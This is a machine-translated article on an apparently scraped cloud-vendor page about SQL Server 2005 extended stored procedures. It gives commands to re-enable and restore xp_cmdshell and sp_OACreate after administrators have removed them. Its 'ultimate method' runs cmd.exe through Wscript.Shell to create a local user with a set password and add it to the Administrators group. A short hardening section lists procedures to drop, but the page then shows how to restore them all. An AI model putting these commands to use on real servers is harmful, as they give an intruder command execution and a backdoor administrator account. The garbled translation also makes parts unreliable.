Home > Developer > SQL Server

Ways to open xp_cmdshell under SQL Server 2005

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

EXEC sp_configure ' show advanced options ', 1; RECONFIGURE; EXEC sp_configure ' xp_cmdshell ', 1; RECONFIGURE;
SQL2005 Open the ' OPENROWSET ' support method:
exec sp_configure ' show advanced options ', 1; Reconfigure;exec sp_configure ' Ad Hoc distributed Queries ', 1; RECONFIGURE;
SQL2005 Open the ' sp_OACreate ' support method:
exec sp_configure ' show advanced options ', 1; Reconfigure;exec sp_configure ' Ole Automation procedures ', 1; RECONFIGURE;
Overcoming the various difficulties of SA
Common situation Recovery Execution xp_cmdshell
1 failed to find the stored procedure ' master '. Xpcmdshell '.
Recovery method: After the query separator is connected,
First step: EXEC sp_addextendedproc xp_cmdshell, @dllname = ' xplog70.dll ' declare @o int
Step two: Sp_addextendedproc ' xp_cmdshell ', ' Xpsql70.dll '
Then press the F5 key to execute the command.
2 cannot load DLL Xpsql70.dll or one of the DLLs referenced by the DLL. Cause 126 (The specified module cannot be found.) )
Recovery method: After the query separator is connected,
First step: Sp_dropextendedproc "xp_cmdshell"
Step two: Sp_addextendedproc ' xp_cmdshell ', ' Xpsql70.dll '
Then press the F5 key to execute the command.
3 function xp_cmdshell cannot be found in library Xpweb70.dll. Cause: 127 (The specified program could not be found.) )
Recovery method: After the query separator is connected,
First step: Exec sp_dropextendedproc ' xp_cmdshell '
Second step: Exec sp_addextendedproc ' xp_cmdshell ', ' Xpweb70.dll '
Then press the F5 key to execute the command.
Four. The ultimate method.
If none of the above methods are recoverable, try adding your account directly using the following method:
After the query separator is connected,
2000servser System:
DECLARE @shell int exec sp_oacreate ' Wscript.Shell ', @shell output exec sp_OAMethod @shell, ' run ', NULL, ' C:/winnt/system32 /cmd.exe/c net user Dell Huxifeng007/add '
DECLARE @shell int exec sp_oacreate ' Wscript.Shell ', @shell output exec sp_OAMethod @shell, ' run ', NULL, ' C:/winnt/system32 /CMD.EXE/C net localgroup Administrators Dell/add '
XP or 2003server system:
DECLARE @shell int exec sp_oacreate ' Wscript.Shell ', @shell output exec sp_OAMethod @shell, ' run ', NULL, ' c:/windows/ system32/cmd.exe/c net user Dell Huxifeng007/add '
DECLARE @shell int exec sp_oacreate ' Wscript.Shell ', @shell output exec sp_OAMethod @shell, ' run ', NULL, ' c:/windows/ SYSTEM32/CMD.EXE/C net localgroup Administrators Dell/add '
--------------
xp_cmdshell new methods of recovery
Delete
drop procedure Sp_addextendedproc
drop procedure sp_OACreate
exec sp_dropextendedproc ' xp_cmdshell '
Recovery
DBCC ADDEXTENDEDPROC ("sp_OACreate", "Odsole70.dll")
DBCC ADDEXTENDEDPROC ("xp_cmdshell", "Xplog70.dll")
This can be restored directly, without having to tube sp_addextendedproc is not there
-----------------------------
Delete the statement that extended stored procedure xp_cmdshell:
exec sp_dropextendedproc ' xp_cmdshell '
Recovering SQL statements for Cmdshell
exec sp_addextendedproc xp_cmdshell, @dllname = ' Xplog70.dll '
Open SQL statement for Cmdshell
exec sp_addextendedproc xp_cmdshell, @dllname = ' Xplog70.dll '
Determine if the storage extension exists
Select COUNT (*) from master.dbo.sysobjects where xtype= ' x ' and name= ' xp_cmdshell '
Return result is 1 OK
Recovery xp_cmdshell
exec master.dbo.addextendedproc ' xp_cmdshell ', ' Xplog70.dll '; select COUNT (*) from master.dbo.sysobjects where xtype= ' x ' and name= ' xp_cmdshell '
Return result is 1 OK
otherwise upload Xplog7.0.dll
exec master.dbo.addextendedproc ' xp_cmdshell ', ' C:/winnt/system32/xplog70.dll '
Plugging in the Cmdshell SQL statement
Sp_dropextendedproc "xp_cmdshell
----------------
Delete SQL Dangerous storage:
DROP PROCEDURE sp_makewebtask
EXEC master. Sp_dropextendedproc xp_cmdshell
EXEC master. Sp_dropextendedproc Xp_dirtree
EXEC master. Sp_dropextendedproc xp_fileexist
EXEC master. Sp_dropextendedproc xp_terminate_process
EXEC master. Sp_dropextendedproc sp_OAMethod
EXEC master. Sp_dropextendedproc sp_OACreate
EXEC master. Sp_dropextendedproc xp_regaddmultistring
EXEC master. Sp_dropextendedproc Xp_regdeletekey
EXEC master. Sp_dropextendedproc Xp_regdeletevalue
EXEC master. Sp_dropextendedproc Xp_regenumkeys
EXEC master. Sp_dropextendedproc xp_regenumvalues
EXEC master. Sp_dropextendedproc Sp_add_job
EXEC master. Sp_dropextendedproc sp_addtask
EXEC master. Sp_dropextendedproc Xp_regread
EXEC master. Sp_dropextendedproc xp_regwrite
EXEC master. Sp_dropextendedproc Xp_readwebtask
EXEC master. Sp_dropextendedproc Xp_makewebtask
EXEC master. Sp_dropextendedproc xp_regremovemultistring
EXEC master. Sp_dropextendedproc sp_OACreate
DROP PROCEDURE Sp_addextendedproc
/* No Fox attached methods for recovering extended stored procedures
Restore Sp_addextendedproc first, with the following statement:
SQL code
CREATE PROCEDURE sp_addextendedproc---1996/08/30 20:13
@functname nvarchar (517),/* (owner.) Name of function to call * * @dllname varchar (255)/* Name of DLL containing function */AS
Set Implicit_transactions off
If @ @trancount > 0
Begin
RAISERROR (15002,-1,-1, ' sp_addextendedproc ')
Return (1)
End
DBCC ADDEXTENDEDPROC (@functname, @dllname)
Return (0)--sp_addextendedproc
GO
Restore all extended stored procedures above
SQL code
Use master
exec sp_addextendedproc xp_cmdshell, ' Xp_cmdshell.dll '
exec sp_addextendedproc xp_dirtree, ' Xpstar.dll '
exec sp_addextendedproc xp_enumgroups, ' Xplog70.dll '
exec sp_addextendedproc xp_fixeddrives, ' Xpstar.dll '
exec sp_addextendedproc xp_loginconfig, ' Xplog70.dll '
exec sp_addextendedproc xp_enumerrorlogs, ' Xpstar.dll '
exec sp_addextendedproc xp_getfiledetails, ' Xpstar.dll '
exec sp_addextendedproc sp_OACreate, ' Odsole70.dll '
exec sp_addextendedproc sp_OADestroy, ' Odsole70.dll '
exec sp_addextendedproc sp_OAGetErrorInfo, ' Odsole70.dll '
exec sp_addextendedproc sp_OAGetProperty, ' Odsole70.dll '
exec sp_addextendedproc sp_OAMethod, ' Odsole70.dll '
exec sp_addextendedproc sp_OASetProperty, ' Odsole70.dll '
exec sp_addextendedproc sp_oastop, ' Odsole70.dll '
exec sp_addextendedproc xp_regaddmultistring, ' Xpstar.dll '
exec sp_addextendedproc xp_regdeletekey, ' Xpstar.dll '
exec sp_addextendedproc xp_regdeletevalue, ' Xpstar.dll '
exec sp_addextendedproc xp_regenumvalues, ' Xpstar.dll '
exec sp_addextendedproc xp_regread, ' Xpstar.dll '
exec sp_addextendedproc xp_regremovemultistring, ' Xpstar.dll '
exec sp_addextendedproc xp_regwrite, ' Xpstar.dll '
exec sp_addextendedproc Xp_availablemedia, ' Xpstar.dll '

Copyright NOTICE: This article for Bo Master original article, without Bo Master permission not reproduced.

Ways to open xp_cmdshell under SQL Server 2005

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
how to connect sql server 2005 migrate sql server 2005 to 2014 export access to sql server 2005 how to use microsoft sql server 2005 sql server 2005 port sql server 2005 replace sql server 2005 download
Related Article
pymssql calling SQL Server stored procedure with output param...

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More